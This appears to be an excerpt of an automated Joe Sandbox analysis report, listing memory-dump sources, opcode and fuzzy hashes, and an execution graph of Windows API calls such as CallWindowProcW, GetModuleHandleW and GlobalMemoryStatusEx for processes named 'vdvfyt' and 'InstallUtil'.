                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853689131.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6860000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 02185a9d63674cf31d086b32e90f5ca9f29369558ab8442725f8a79ea96bb5d0
                                                                                    • Instruction ID: ce3b2e00c7f96e41d3e9e91b64ef1edf56474f104d3b1671bbcdd61e924813fd
                                                                                    • Opcode Fuzzy Hash: 02185a9d63674cf31d086b32e90f5ca9f29369558ab8442725f8a79ea96bb5d0
                                                                                    • Instruction Fuzzy Hash: F2D067789143588FDB91DF20E885759BBB6AB09318F209096941DA7315CB7459C8CF45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c9de6ec66841af58a3c5e8ecea50dea1b812d3975b3461a07d7625a4baf4c7cb
                                                                                    • Instruction ID: c0af566a9f1e5e26c5327c70738166c4180aa48cb4866d72f5732c941ca76646
                                                                                    • Opcode Fuzzy Hash: c9de6ec66841af58a3c5e8ecea50dea1b812d3975b3461a07d7625a4baf4c7cb
                                                                                    • Instruction Fuzzy Hash: 79C04C5441E7C16EE31227200C105826EA96D8722878A57C750D1952D295080994D6A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853689131.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6860000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0cda7af30993cbef0b2bdbb6c2e2c6ecad43c19218673cdc4ec6097587c8c9fe
                                                                                    • Instruction ID: 910e5bb9c1d2dee587564cbde194a83754f66138d737fdf39bfd9e0632ec51db
                                                                                    • Opcode Fuzzy Hash: 0cda7af30993cbef0b2bdbb6c2e2c6ecad43c19218673cdc4ec6097587c8c9fe
                                                                                    • Instruction Fuzzy Hash: 02C04C76E1012E9BCF00DBD9F9508DCFB74EF94321F404036D214A7104D6301526CF58
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d77bbef3c40adac2653d38adde5970580424de443dacdab50ee6bc935a9cbfbf
                                                                                    • Instruction ID: ae4543aab88c7c7a9cdf9b50a1360ac691a699453280096746666fbdd7f80041
                                                                                    • Opcode Fuzzy Hash: d77bbef3c40adac2653d38adde5970580424de443dacdab50ee6bc935a9cbfbf
                                                                                    • Instruction Fuzzy Hash: 1EC080334042015EC331CF10D54BFB6BFD5EB5030CF4C442DD94541408C7306411CAA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1e6af665db09707fbddf1f783edade9cc6b24aaf62b44289be5c093c7ec42752
                                                                                    • Instruction ID: b64cfc642e91e9e0974c3c12b98ac20c352b4ad516d2d8cf083eef4db1388ce0
                                                                                    • Opcode Fuzzy Hash: 1e6af665db09707fbddf1f783edade9cc6b24aaf62b44289be5c093c7ec42752
                                                                                    • Instruction Fuzzy Hash: 63C08CB9094350C6C310A7ACDB4CAA97FA45F80331F18CBA3D0385A8F3C7348C66D109
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2853606151.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_6850000_vdvfyt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                    • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                                    • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                    • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

                                                                                    Execution Graph

                                                                                    Execution Coverage:11%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:187
                                                                                    Total number of Limit Nodes:19
                                                                                    execution_graph 40029 2a0d030 40030 2a0d048 40029->40030 40031 2a0d0a2 40030->40031 40036 657d9d0 40030->40036 40040 657e718 40030->40040 40049 657cf5c 40030->40049 40058 657d9bf 40030->40058 40037 657d9f6 40036->40037 40038 657cf5c CallWindowProcW 40037->40038 40039 657da17 40038->40039 40039->40031 40041 657e755 40040->40041 40042 657e789 40041->40042 40044 657e779 40041->40044 40078 657d084 40042->40078 40062 657e97c 40044->40062 40068 657e8a0 40044->40068 40073 657e8b0 40044->40073 40045 657e787 40045->40045 40050 657cf67 40049->40050 40051 657e789 40050->40051 40053 657e779 40050->40053 40052 657d084 CallWindowProcW 40051->40052 40054 657e787 40052->40054 40055 657e8b0 CallWindowProcW 40053->40055 40056 657e8a0 CallWindowProcW 40053->40056 40057 657e97c CallWindowProcW 40053->40057 40054->40054 40055->40054 40056->40054 40057->40054 40059 657d9cd 40058->40059 40060 657cf5c CallWindowProcW 40059->40060 40061 657da17 40060->40061 40061->40031 40063 657e93a 40062->40063 40064 657e98a 40062->40064 40082 657e958 40063->40082 40086 657e968 40063->40086 40065 657e950 40065->40045 40070 657e8b1 40068->40070 40069 657e950 40069->40045 40071 657e958 CallWindowProcW 40070->40071 40072 657e968 CallWindowProcW 40070->40072 40071->40069 40072->40069 40074 657e8c4 40073->40074 40076 657e958 CallWindowProcW 40074->40076 40077 657e968 CallWindowProcW 40074->40077 40075 657e950 40075->40045 40076->40075 40077->40075 40079 657d08f 40078->40079 40080 657fe6a CallWindowProcW 40079->40080 40081 657fe19 40079->40081 40080->40081 40081->40045 40083 657e968 40082->40083 40084 657e979 40083->40084 40089 657fda0 40083->40089 40084->40065 40087 657e979 40086->40087 40088 657fda0 CallWindowProcW 40086->40088 40087->40065 40088->40087 40090 657d084 CallWindowProcW 40089->40090 40091 657fdba 40090->40091 40091->40084 40092 2be0848 40098 2be084e 40092->40098 40093 2be091b 40098->40093 40099 6571cf0 40098->40099 40103 6571d82 40098->40103 40109 6571d00 40098->40109 40113 2be1380 40098->40113 40100 6571d00 40099->40100 40117 65714b4 40100->40117 40104 6571d02 40103->40104 40108 6571d8a 40103->40108 40105 6571d57 40104->40105 40106 65714b4 3 API calls 40104->40106 40105->40098 40107 6571d30 40106->40107 40107->40098 40108->40098 40110 6571d0f 40109->40110 40111 65714b4 3 API calls 40110->40111 40112 6571d30 40111->40112 40112->40098 40115 2be138b 40113->40115 40114 2be1480 40114->40098 40115->40114 40237 2be7ea8 40115->40237 40118 65714bf 40117->40118 40121 6572c0c 40118->40121 40120 65736b6 40120->40120 40122 6572c17 40121->40122 40123 6573ddc 40122->40123 40126 6575a60 40122->40126 40130 6575a5e 40122->40130 40123->40120 40128 6575a81 40126->40128 40127 6575aa5 40127->40123 40128->40127 40134 6575c10 40128->40134 40131 6575a60 40130->40131 40132 6575aa5 40131->40132 40133 6575c10 3 API calls 40131->40133 40132->40123 40133->40132 40135 6575c1d 40134->40135 40136 6575c56 40135->40136 40138 657493c 40135->40138 40136->40127 40139 6574947 40138->40139 40141 6575cc8 40139->40141 40142 6574970 40139->40142 40141->40141 40143 657497b 40142->40143 40149 6574980 40143->40149 40145 6575d37 40153 657af48 40145->40153 40162 657af60 40145->40162 40146 6575d71 40146->40141 40152 657498b 40149->40152 40150 6576ed8 40150->40145 40151 6575a60 3 API calls 40151->40150 40152->40150 40152->40151 40155 657af91 40153->40155 40157 657b091 40153->40157 40154 657af9d 40154->40146 40155->40154 40171 657b1d8 40155->40171 40175 657b1c8 40155->40175 40156 657afdd 40180 657c4c9 40156->40180 40190 657c4d8 40156->40190 40157->40146 40164 657b091 40162->40164 40165 657af91 40162->40165 40163 657af9d 40163->40146 40164->40146 40165->40163 40167 657b1d8 3 API calls 40165->40167 40168 657b1c8 3 API calls 40165->40168 40166 657afdd 40169 657c4c9 GetModuleHandleW 40166->40169 40170 657c4d8 GetModuleHandleW 40166->40170 40167->40166 40168->40166 40169->40164 40170->40164 40200 657b218 40171->40200 40209 657b228 40171->40209 40172 657b1e2 40172->40156 40176 657b1d8 40175->40176 40178 657b218 2 API calls 40176->40178 40179 657b228 2 API calls 40176->40179 40177 657b1e2 40177->40156 40178->40177 40179->40177 40181 657c503 40180->40181 40218 657a37c 40181->40218 40184 657c586 40186 657c5b2 40184->40186 40233 657a2a8 40184->40233 40189 657a37c GetModuleHandleW 40189->40184 40191 657c503 40190->40191 40192 657a37c GetModuleHandleW 40191->40192 40193 657c56a 40192->40193 40197 657ca40 GetModuleHandleW 40193->40197 40198 657c990 GetModuleHandleW 40193->40198 40199 657a37c GetModuleHandleW 40193->40199 40194 657c586 40195 657a2a8 GetModuleHandleW 40194->40195 40196 657c5b2 40194->40196 40195->40196 40197->40194 40198->40194 40199->40194 40201 657b21d 40200->40201 40202 657a2a8 GetModuleHandleW 40201->40202 40204 657b25c 40201->40204 40203 657b244 40202->40203 40203->40204 40208 657b4b2 GetModuleHandleW 40203->40208 40204->40172 40205 657b460 GetModuleHandleW 40207 657b48d 40205->40207 40206 657b254 40206->40204 40206->40205 40207->40172 40208->40206 40210 657b239 40209->40210 40213 657b25c 40209->40213 40211 657a2a8 GetModuleHandleW 40210->40211 40212 657b244 40211->40212 40212->40213 40217 657b4b2 GetModuleHandleW 40212->40217 40213->40172 40214 657b460 GetModuleHandleW 40216 657b48d 40214->40216 40215 657b254 40215->40213 40215->40214 40216->40172 40217->40215 40219 657a387 40218->40219 40220 657c56a 40219->40220 40221 657cbb0 GetModuleHandleW 40219->40221 40222 657cba0 GetModuleHandleW 40219->40222 40220->40189 40223 657c990 40220->40223 40228 657ca40 40220->40228 40221->40220 40222->40220 40224 657c9a0 40223->40224 40225 657c9ab 40224->40225 40226 657cbb0 GetModuleHandleW 40224->40226 40227 657cba0 GetModuleHandleW 40224->40227 40225->40184 40226->40225 40227->40225 40229 657ca6d 40228->40229 40230 657caee 40229->40230 40231 657cbb0 GetModuleHandleW 40229->40231 40232 657cba0 GetModuleHandleW 40229->40232 40231->40230 40232->40230 40234 657b418 GetModuleHandleW 40233->40234 40236 657b48d 40234->40236 40236->40186 40238 2be7eb2 40237->40238 40239 2be7ecc 40238->40239 40242 658fab8 40238->40242 40247 658faa9 40238->40247 40239->40115 40244 658facd 40242->40244 40243 658fce2 40243->40239 40244->40243 40245 658fd08 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40244->40245 40246 658fcf7 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40244->40246 40245->40244 40246->40244 40249 658fab8 40247->40249 40248 658fce2 40248->40239 40249->40248 40250 658fd08 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40249->40250 40251 658fcf7 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40249->40251 40250->40249 40251->40249 40023 6573050 DuplicateHandle 40024 65730e6 40023->40024 40025 657d818 40026 657d880 CreateWindowExW 40025->40026 40028 657d93c 40026->40028
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3378418107.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_6580000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d848223d94ef1310cba3f8f04c13a369dfe4c84732d21d475bbb1ad69d869dfa
                                                                                    • Instruction ID: d1423692fd1518c9eb811c4b212218e51d7d8fcf1ff965026fce41bf7c4bbb8a
                                                                                    • Opcode Fuzzy Hash: d848223d94ef1310cba3f8f04c13a369dfe4c84732d21d475bbb1ad69d869dfa
                                                                                    • Instruction Fuzzy Hash: E5624B34A00205CFDB54EB68D994AADBBF2FB88314F248469E805EB794DB35EC45CF91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3378418107.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_6580000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e6504a2bf20bdf2f1bc4f7394f471c6b366d41d27a9f2fa54f25c7b0617b7144
                                                                                    • Instruction ID: f8e29e1447dff460a0ad4a99fa3e965e9dd9f165e1a82e970643286b69a82ca8
                                                                                    • Opcode Fuzzy Hash: e6504a2bf20bdf2f1bc4f7394f471c6b366d41d27a9f2fa54f25c7b0617b7144
                                                                                    • Instruction Fuzzy Hash: 9F325E34B102098FDB54EB68D890BAEB7B2FB89710F108529E905EB754DB35EC41DFA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3378418107.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_6580000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 940f212333245fc85a7601c6f1a923d86de65837f9ec30ca9b6ac77f7c0e22f7
                                                                                    • Instruction ID: 7c1c9f580fd7ac3b399d27669cd9e33832bdb58e2383351eac4f71adc8b59261
                                                                                    • Opcode Fuzzy Hash: 940f212333245fc85a7601c6f1a923d86de65837f9ec30ca9b6ac77f7c0e22f7
                                                                                    • Instruction Fuzzy Hash: 9212AE75F002159FDFA4EB64D8807AEBBA6FB84310F248469D856EB745EA34EC41CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3378418107.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_6580000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 13def1b15cbbfdd2ce9b5ee48b4c8f39d019863e973760039306758a5463edc5
                                                                                    • Instruction ID: 820ea234753264a20a733641d7f30a476b8ea09e75de70d58fa17a2b14e827c0
                                                                                    • Opcode Fuzzy Hash: 13def1b15cbbfdd2ce9b5ee48b4c8f39d019863e973760039306758a5463edc5
                                                                                    • Instruction Fuzzy Hash: 4361F471F001214FDF51AB7EDD8465EBADBAFC4620B154039D80AEB360DEA9ED028BC5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3378418107.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_6580000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 32f5910feaae076480c230fab988ae4ac95700da046d516629aaf69a59d5545f
                                                                                    • Instruction ID: d953c3eaeb09341450dca239b5c25f8c4c0f4b0f64838b89e05823377944d1b8
                                                                                    • Opcode Fuzzy Hash: 32f5910feaae076480c230fab988ae4ac95700da046d516629aaf69a59d5545f
                                                                                    • Instruction Fuzzy Hash: 39913D30E1061A8FDF60DF68C890B9DB7B1FF89310F208599D549BB295DB71AA85CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3378418107.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_6580000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 033b3b3280438eb072f298fc4f12adbc845b4a19904cb278ef17be782ba7f96f
                                                                                    • Instruction ID: b140e14ed115251a736d3bef9c56f75a66882718f4b49aacd23be0effb553a29
                                                                                    • Opcode Fuzzy Hash: 033b3b3280438eb072f298fc4f12adbc845b4a19904cb278ef17be782ba7f96f
                                                                                    • Instruction Fuzzy Hash: 83911C30E1061A8FDF60DF68C890B9DB7B1FF89310F208599D549BB255DB71AA85CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3378418107.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_6580000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 86c5dd26540bc8fc04b91eac881462e5778f1f82b1f47140eee428b753a6af60
                                                                                    • Instruction ID: e9fce0b2be25419841521c32140f6962bcafa1e7fdd55068a3d23314c90351ab
                                                                                    • Opcode Fuzzy Hash: 86c5dd26540bc8fc04b91eac881462e5778f1f82b1f47140eee428b753a6af60
                                                                                    • Instruction Fuzzy Hash: EC31C134B002058FDB59AB74C56466E7BB2BB89710F28886DD806EB784DF39CD46CBD1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3378418107.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_6580000_InstallUtil.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c2e23389fbd4881e4f47e0b6fb7d26474a49d55fbaa6be39d2eaacd9fd74c279
                                                                                    • Instruction ID: 27f7e38f898dc867c2ea1c280ee3d143a00edad6384d697a61f4df381fd385c5
                                                                                    • Opcode Fuzzy Hash: c2e23389fbd4881e4f47e0b6fb7d26474a49d55fbaa6be39d2eaacd9fd74c279
                                                                                    • Instruction Fuzzy Hash: 2E116F35B141800FDB12A67C8C94B2B7BE6EFCA710F04846AF547CB686DE29CC02C795